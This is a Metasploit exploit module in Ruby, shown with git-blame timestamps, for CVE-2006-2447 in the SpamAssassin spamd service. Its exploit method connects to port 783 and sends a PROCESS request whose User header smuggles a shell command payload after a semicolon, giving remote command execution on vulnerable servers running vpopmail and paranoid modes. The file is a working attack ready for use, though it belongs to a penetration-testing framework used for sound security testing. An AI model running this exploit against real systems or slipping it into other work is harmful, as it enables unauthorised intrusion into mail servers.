2008-07-19 15:40:30 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2008-07-19 15:40:30 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = ExcellentRanking
|
2008-07-19 15:40:30 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2008-07-19 15:40:30 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'SpamAssassin spamd Remote Command Execution',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a flaw in the SpamAssassin spamd service by specifying
|
2010-04-30 08:40:19 +00:00
|
|
|
a malicious vpopmail User header, when running with vpopmail and paranoid
|
|
|
|
modes enabled (non-default). Versions prior to v3.1.3 are vulnerable
|
2008-07-19 15:40:30 +00:00
|
|
|
},
|
|
|
|
'Author' => [ 'patrick' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2006-2447' ],
|
2009-07-27 14:05:23 +00:00
|
|
|
[ 'OSVDB', '26177' ],
|
2008-07-19 15:40:30 +00:00
|
|
|
[ 'BID', '18290' ],
|
|
|
|
[ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'DisableNops' => true,
|
|
|
|
'Space' => 1024,
|
2009-07-21 15:20:35 +00:00
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'RequiredCmd' => 'generic perl ruby bash telnet',
|
|
|
|
}
|
2010-04-30 08:40:19 +00:00
|
|
|
},
|
2008-07-19 15:40:30 +00:00
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
2010-04-30 08:40:19 +00:00
|
|
|
'Targets' =>
|
2008-07-19 15:40:30 +00:00
|
|
|
[
|
|
|
|
[ 'Automatic', { }],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jun 06 2006',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
register_options(
|
2008-07-19 15:40:30 +00:00
|
|
|
[
|
|
|
|
Opt::RPORT(783)
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
connect
|
|
|
|
|
|
|
|
content = Rex::Text.rand_text_alpha(20)
|
|
|
|
|
|
|
|
sploit = "PROCESS SPAMC/1.2\r\n"
|
|
|
|
sploit << "Content-length: #{(content.length + 2)}\r\n"
|
|
|
|
sploit << "User: ;#{payload.encoded}\r\n\r\n"
|
|
|
|
sploit << content + "\r\n\r\n"
|
|
|
|
|
|
|
|
sock.put(sploit)
|
|
|
|
|
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
2009-07-21 15:20:35 +00:00
|
|
|
end
|